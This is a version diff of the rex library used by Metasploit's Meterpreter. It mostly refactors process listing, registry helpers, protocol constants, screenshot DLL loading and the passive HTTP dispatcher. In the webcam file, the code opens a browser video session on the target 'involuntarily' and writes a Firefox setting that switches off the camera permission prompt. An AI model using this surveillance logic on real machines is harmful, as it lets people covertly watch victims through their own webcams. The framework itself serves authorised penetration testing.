rex 2.0.8 → 2.0.9

data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb

@@ -391,13 +391,26 @@ class ProcessList < Array
     cols.delete_if { |c| !( first.has_key?(c.downcase) ) or first[c.downcase].nil? }
 
     opts = {
-      "Header"  => "Process List",
-      "Columns" => cols
+      'Header' => 'Process List',
+      'Indent' => 1,
+      'Columns' => cols
     }.merge(opts)
 
     tbl = Rex::Ui::Text::Table.new(opts)
     each { |process|
-      tbl << cols.map {|c| process[c.downcase] }.compact
+      tbl << cols.map { |c|
+        col = c.downcase
+        val = process[col]
+        if col == 'session'
+          val == 0xFFFFFFFF ? '' : val.to_s
+        elsif col == 'arch'
+          # for display and consistency with payload naming we switch the internal
+          # 'x86_64' value to display 'x64'
+          val == ARCH_X86_64 ? 'x64' : val
+        else
+          val
+        end
+      }.compact
     }
 
     tbl

data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb

@@ -77,6 +77,22 @@ class Registry
         client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
   end
 
+  # Checks if a key exists on the target registry
+  #
+  # @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
+  # @param base_key [String] the base part of the key path
+  # @return [Boolean] true if the key exists on the target registry, false otherwise, even
+  #   it the session hasn't permissions to access the target key.
+  # @raise [TimeoutError] if the timeout expires when waiting the answer
+  # @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
+  def Registry.check_key_exists(root_key, base_key)
+    request = Packet.create_request('stdapi_registry_check_key_exists')
+    request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
+    request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
+    response = client.send_request(request)
+    return response.get_tlv(TLV_TYPE_BOOL).value
+  end
+
   #
   # Opens the supplied registry key on the specified remote host. Requires that the
   # current process has credentials to access the target and that the target has the
@@ -380,13 +396,20 @@ class Registry
   # Returns the integer value associated with the supplied registry value
   # type (like REG_SZ).
   #
+  # @see https://msdn.microsoft.com/en-us/library/windows/desktop/ms724884(v=vs.85).aspx
+  # @param type [String] A Windows registry type constant name, e.g. 'REG_SZ'
+  # @return [Integer] one of the `REG_*` constants
   def self.type2str(type)
-    return REG_SZ if (type == 'REG_SZ')
-    return REG_DWORD if (type == 'REG_DWORD')
-    return REG_BINARY if (type == 'REG_BINARY')
-    return REG_EXPAND_SZ if (type == 'REG_EXPAND_SZ')
-    return REG_NONE if (type == 'REG_NONE')
-    return nil
+    case type
+    when 'REG_BINARY'    then REG_BINARY
+    when 'REG_DWORD'     then REG_DWORD
+    when 'REG_EXPAND_SZ' then REG_EXPAND_SZ
+    when 'REG_MULTI_SZ'  then REG_MULTI_SZ
+    when 'REG_NONE'      then REG_NONE
+    when 'REG_SZ'        then REG_SZ
+    else
+      nil
+    end
   end
 
   #

data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb

@@ -163,7 +163,11 @@ class RegistryKey
   # Returns the path to the key.
   #
   def to_s
-    return self.root_key.to_s + "\\" + self.base_key
+    if self.base_key.nil?
+      self.root_key.to_s + "\\"
+    else
+      self.root_key.to_s + "\\" + self.base_key
+    end
   end
 
   #

data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb

@@ -29,6 +29,16 @@ TLV_TYPE_FILE_NAME          = TLV_META_TYPE_STRING  | 1201
 TLV_TYPE_FILE_PATH          = TLV_META_TYPE_STRING  | 1202
 TLV_TYPE_FILE_MODE          = TLV_META_TYPE_STRING  | 1203
 TLV_TYPE_FILE_SIZE          = TLV_META_TYPE_UINT    | 1204
+TLV_TYPE_FILE_SHORT_NAME    = TLV_META_TYPE_STRING  | 1205
+TLV_TYPE_FILE_HASH          = TLV_META_TYPE_RAW     | 1206
+
+TLV_TYPE_MOUNT              = TLV_META_TYPE_GROUP   | 1207
+TLV_TYPE_MOUNT_NAME         = TLV_META_TYPE_STRING  | 1208
+TLV_TYPE_MOUNT_TYPE         = TLV_META_TYPE_UINT    | 1209
+TLV_TYPE_MOUNT_SPACE_USER   = TLV_META_TYPE_QWORD   | 1210
+TLV_TYPE_MOUNT_SPACE_TOTAL  = TLV_META_TYPE_QWORD   | 1211
+TLV_TYPE_MOUNT_SPACE_FREE   = TLV_META_TYPE_QWORD   | 1212
+TLV_TYPE_MOUNT_UNCPATH      = TLV_META_TYPE_STRING  | 1213
 
 TLV_TYPE_STAT_BUF           = TLV_META_TYPE_COMPLEX | 1220
 
@@ -111,12 +121,14 @@ TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
 TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
 
 # Config
-TLV_TYPE_COMPUTER_NAME      = TLV_META_TYPE_STRING  | 1040
-TLV_TYPE_OS_NAME            = TLV_META_TYPE_STRING  | 1041
-TLV_TYPE_USER_NAME          = TLV_META_TYPE_STRING  | 1042
-TLV_TYPE_ARCHITECTURE       = TLV_META_TYPE_STRING  | 1043
-TLV_TYPE_LANG_SYSTEM        = TLV_META_TYPE_STRING  | 1044
-TLV_TYPE_SID                = TLV_META_TYPE_STRING  | 1045
+TLV_TYPE_COMPUTER_NAME          = TLV_META_TYPE_STRING  | 1040
+TLV_TYPE_OS_NAME                = TLV_META_TYPE_STRING  | 1041
+TLV_TYPE_USER_NAME              = TLV_META_TYPE_STRING  | 1042
+TLV_TYPE_ARCHITECTURE           = TLV_META_TYPE_STRING  | 1043
+TLV_TYPE_LANG_SYSTEM            = TLV_META_TYPE_STRING  | 1044
+TLV_TYPE_SID                    = TLV_META_TYPE_STRING  | 1045
+TLV_TYPE_DOMAIN                 = TLV_META_TYPE_STRING  | 1046
+TLV_TYPE_LOGGED_ON_USER_COUNT   = TLV_META_TYPE_UINT    | 1047
 
 # Environment
 TLV_TYPE_ENV_VARIABLE       = TLV_META_TYPE_STRING  | 1100

data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb

@@ -157,7 +157,7 @@ class UI < Rex::Post::UI
 
     # include the x64 screenshot dll if the host OS is x64
     if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
-      screenshot_path = MeterpreterBinaries.path('screenshot','x64.dll')
+      screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x64.dll')
       if screenshot_path.nil?
         raise RuntimeError, "screenshot.x64.dll not found", caller
       end
@@ -172,7 +172,7 @@ class UI < Rex::Post::UI
     end
 
     # but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
-    screenshot_path = MeterpreterBinaries.path('screenshot','x86.dll')
+    screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x86.dll')
     if screenshot_path.nil?
       raise RuntimeError, "screenshot.x86.dll not found", caller
     end

data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb

@@ -1,7 +1,5 @@
 # -*- coding: binary -*-
 
-#require 'rex/post/meterpreter/extensions/process'
-
 module Rex
 module Post
 module Meterpreter
@@ -15,7 +13,6 @@ module Webcam
 #
 ###
 class Webcam
-
   include Msf::Post::Common
   include Msf::Post::File
   include Msf::Post::WebRTC
@@ -31,9 +28,9 @@ class Webcam
   def webcam_list
     response = client.send_request(Packet.create_request('webcam_list'))
     names = []
-    response.get_tlvs( TLV_TYPE_WEBCAM_NAME ).each{ |tlv|
+    response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
       names << tlv.value
-    }
+    end
     names
   end
 
@@ -49,11 +46,11 @@ class Webcam
     request = Packet.create_request('webcam_get_frame')
     request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
     response = client.send_request(request)
-    response.get_tlv( TLV_TYPE_WEBCAM_IMAGE ).value
+    response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
   end
 
   def webcam_stop
-    client.send_request( Packet.create_request( 'webcam_stop' )  )
+    client.send_request(Packet.create_request('webcam_stop'))
     true
   end
 
@@ -67,13 +64,13 @@ class Webcam
     offerer_id = Rex::Text.rand_text_alphanumeric(10)
     channel    = Rex::Text.rand_text_alphanumeric(20)
 
-    remote_browser_path = get_webrtc_browser_path
+    remote_browser_path = webrtc_browser_path
 
     if remote_browser_path.blank?
-      raise RuntimeError, "Unable to find a suitable browser on the target machine"
+      fail "Unable to find a suitable browser on the target machine"
     end
 
-    ready_status = init_video_chat(remote_browser_path, server, channel, offerer_id)
+    init_video_chat(remote_browser_path, server, channel, offerer_id)
     connect_video_chat(server, channel, offerer_id)
   end
 
@@ -83,40 +80,39 @@ class Webcam
     request = Packet.create_request('webcam_audio_record')
     request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
     response = client.send_request(request)
-    response.get_tlv( TLV_TYPE_AUDIO_DATA ).value
+    response.get_tlv(TLV_TYPE_AUDIO_DATA).value
   end
 
   attr_accessor :client
 
-
   private
 
-
   #
   # Returns a browser path that supports WebRTC
   #
   # @return [String]
   #
-  def get_webrtc_browser_path
+  def webrtc_browser_path
     found_browser_path = ''
 
     case client.platform
     when /win/
       paths = [
-        "Program Files\\Google\\Chrome\\Application\\chrome.exe",
-        "Program Files\\Mozilla Firefox\\firefox.exe"
+        "%ProgramFiles(x86)%\\Google\\Chrome\\Application\\chrome.exe",
+        "%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe",
+        "%ProgramW6432%\\Google\\Chrome\\Application\\chrome.exe",
+        "%ProgramFiles(x86)%\\Mozilla Firefox\\firefox.exe",
+        "%ProgramFiles%\\Mozilla Firefox\\firefox.exe",
+        "%ProgramW6432%\\Mozilla Firefox\\firefox.exe"
       ]
 
-      drive = session.sys.config.getenv("SYSTEMDRIVE")
-      paths = paths.map { |p| "#{drive}\\#{p}" }
-
       # Old chrome path
       user_profile = client.sys.config.getenv("USERPROFILE")
       paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
 
       paths.each do |browser_path|
         if file?(browser_path)
-          found_browser_path = browser_path
+          found_browser_path = client.fs.file.expand_path(browser_path)
           break
         end
       end
@@ -124,7 +120,7 @@ class Webcam
     when /osx|bsd/
       [
         '/Applications/Google Chrome.app',
-        '/Applications/Firefox.app',
+        '/Applications/Firefox.app'
       ].each do |browser_path|
         if file?(browser_path)
           found_browser_path = browser_path
@@ -140,7 +136,6 @@ class Webcam
     found_browser_path
   end
 
-
   #
   # Creates a video chat session as an offerer... involuntarily :-p
   # Windows targets only.
@@ -161,9 +156,9 @@ class Webcam
     begin
       write_file("#{tmp_dir}\\interface.html", interface)
       write_file("#{tmp_dir}\\api.js", api)
-    rescue ::Exception => e
-      elog("webcam_chat failed. #{e.class} #{e.to_s}")
-      raise RuntimeError, "Unable to initialize the interface on the target machine"
+    rescue RuntimeError => e
+      elog("webcam_chat failed. #{e.class} #{e}")
+      raise "Unable to initialize the interface on the target machine"
     end
 
     #
@@ -176,26 +171,29 @@ class Webcam
       profile_name = Rex::Text.rand_text_alpha(8)
       o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
       profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
-      setting = %Q|user_pref("media.navigator.permission.disabled", true);|
+      setting = %|user_pref("media.navigator.permission.disabled", true);|
       begin
         write_file(profile_path, setting)
-      rescue ::Exception => e
-        elog("webcam_chat failed: #{e.class} #{e.to_s}")
-        raise RuntimeError, "Unable to write the necessary setting for Firefox."
+      rescue RuntimeError => e
+        elog("webcam_chat failed: #{e.class} #{e}")
+        raise "Unable to write the necessary setting for Firefox."
       end
       args = "-p #{profile_name}"
     end
 
-    exec_opts = {'Hidden' => false, 'Channelized' => false}
+    exec_opts = { 'Hidden' => false, 'Channelized' => false }
 
     begin
       session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
-    rescue ::Exception => e
-      elog("webcam_chat failed. #{e.class} #{e.to_s}")
-      raise RuntimeError, "Unable to start the remote browser: #{e.message}"
+    rescue RuntimeError => e
+      elog("webcam_chat failed. #{e.class} #{e}")
+      raise "Unable to start the remote browser: #{e.message}"
     end
   end
-
 end
-
-end; end; end; end; end; end
+end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/packet.rb

@@ -87,6 +87,23 @@ TLV_TYPE_MIGRATE_BASE_ADDR   = TLV_META_TYPE_UINT   | 407
 TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT   | 408
 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
 
+
+TLV_TYPE_TRANS_TYPE          = TLV_META_TYPE_UINT   | 430
+TLV_TYPE_TRANS_URL           = TLV_META_TYPE_STRING | 431
+TLV_TYPE_TRANS_UA            = TLV_META_TYPE_STRING | 432
+TLV_TYPE_TRANS_COMM_TIMEOUT  = TLV_META_TYPE_UINT   | 433
+TLV_TYPE_TRANS_SESSION_EXP   = TLV_META_TYPE_UINT   | 434
+TLV_TYPE_TRANS_CERT_HASH     = TLV_META_TYPE_RAW    | 435
+TLV_TYPE_TRANS_PROXY_HOST    = TLV_META_TYPE_STRING | 436
+TLV_TYPE_TRANS_PROXY_USER    = TLV_META_TYPE_STRING | 437
+TLV_TYPE_TRANS_PROXY_PASS    = TLV_META_TYPE_STRING | 438
+TLV_TYPE_TRANS_RETRY_TOTAL   = TLV_META_TYPE_UINT   | 439
+TLV_TYPE_TRANS_RETRY_WAIT    = TLV_META_TYPE_UINT   | 440
+TLV_TYPE_TRANS_GROUP         = TLV_META_TYPE_GROUP  | 441
+
+TLV_TYPE_MACHINE_ID          = TLV_META_TYPE_STRING | 460
+TLV_TYPE_UUID                = TLV_META_TYPE_RAW    | 461
+
 TLV_TYPE_CIPHER_NAME         = TLV_META_TYPE_STRING | 500
 TLV_TYPE_CIPHER_PARAMETERS   = TLV_META_TYPE_GROUP  | 501
 
@@ -179,6 +196,18 @@ class Tlv
       when TLV_TYPE_MIGRATE_LEN; "MIGRATE-LEN"
       when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
       when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
+      when TLV_TYPE_TRANS_TYPE; "TRANS-TYPE"
+      when TLV_TYPE_TRANS_URL; "TRANS-URL"
+      when TLV_TYPE_TRANS_COMM_TIMEOUT; "TRANS-COMM-TIMEOUT"
+      when TLV_TYPE_TRANS_SESSION_EXP; "TRANS-SESSION-EXP"
+      when TLV_TYPE_TRANS_CERT_HASH; "TRANS-CERT-HASH"
+      when TLV_TYPE_TRANS_PROXY_HOST; "TRANS-PROXY-HOST"
+      when TLV_TYPE_TRANS_PROXY_USER; "TRANS-PROXY-USER"
+      when TLV_TYPE_TRANS_PROXY_PASS; "TRANS-PROXY-PASS"
+      when TLV_TYPE_TRANS_RETRY_TOTAL; "TRANS-RETRY-TOTAL"
+      when TLV_TYPE_TRANS_RETRY_WAIT; "TRANS-RETRY-WAIT"
+      when TLV_TYPE_MACHINE_ID; "MACHINE-ID"
+      when TLV_TYPE_UUID; "UUID"
 
       #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'
       #when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address'

data/lib/rex/post/meterpreter/packet_dispatcher.rb

@@ -66,9 +66,12 @@ module PacketDispatcher
     self.waiters    = []
     self.alive      = true
 
+    # Ensure that there is only one leading and trailing slash on the URI
+    resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
+
     self.passive_service = self.passive_dispatcher
-    self.passive_service.remove_resource("/" + self.conn_id  + "/")
-    self.passive_service.add_resource("/" + self.conn_id + "/",
+    self.passive_service.remove_resource(resource_uri)
+    self.passive_service.add_resource(resource_uri,
       'Proc'             => Proc.new { |cli, req| on_passive_request(cli, req) },
       'VirtualDirectory' => true
     )
@@ -76,7 +79,16 @@ module PacketDispatcher
 
   def shutdown_passive_dispatcher
     return if not self.passive_service
-    self.passive_service.remove_resource("/" + self.conn_id  + "/")
+
+    # Ensure that there is only one leading and trailing slash on the URI
+    resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
+
+    self.passive_service.remove_resource(resource_uri)
+
+    # If there are no more resources registered on the service, stop it entirely
+    if self.passive_service.resources.empty?
+      Rex::ServiceManager.stop_service(self.passive_service)
+    end
 
     self.alive      = false
     self.send_queue = []
@@ -94,6 +106,8 @@ module PacketDispatcher
     resp['Content-Type'] = 'application/octet-stream'
     resp['Connection']   = 'close'
 
+    self.last_checkin = Time.now
+
     # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue
     if req.body[0,4] == "RECV"
       rpkt = send_queue.shift
@@ -114,9 +128,6 @@ module PacketDispatcher
       cli.send_response(resp)
     end
 
-    # Force a closure for older WinInet implementations
-    self.passive_service.close_client( cli )
-
     rescue ::Exception => e
       elog("Exception handling request: #{cli.inspect} #{req.inspect} #{e.class} #{e} #{e.backtrace}")
     end
@@ -178,7 +189,6 @@ module PacketDispatcher
   # Sends a packet and waits for a timeout for the given time interval.
   #
   def send_request(packet, t = self.response_timeout)
-
     if not t
       send_packet(packet)
       return nil
@@ -490,6 +500,9 @@ module PacketDispatcher
       client = self
     end
 
+    # Update our last reply time
+    client.last_checkin = Time.now
+
     # If the packet is a response, try to notify any potential
     # waiters
     if ((resp = packet.response?))

data/lib/rex/post/meterpreter/ui/console.rb

@@ -83,6 +83,7 @@ class Console
     channel.extend(InteractiveChannel) unless (channel.kind_of?(InteractiveChannel) == true)
     channel.on_command_proc = self.on_command_proc if self.on_command_proc
     channel.on_print_proc   = self.on_print_proc if self.on_print_proc
+    channel.on_log_proc = method(:log_output) if self.respond_to?(:log_output, true)
 
     channel.interact(input, output)
     channel.reset_ui